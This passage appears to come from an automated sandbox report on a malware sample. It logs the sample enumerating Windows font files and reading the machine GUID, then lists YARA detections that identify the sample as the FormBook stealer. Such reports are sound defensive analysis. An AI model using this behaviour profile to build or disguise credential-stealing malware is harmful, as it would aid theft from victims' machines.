            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
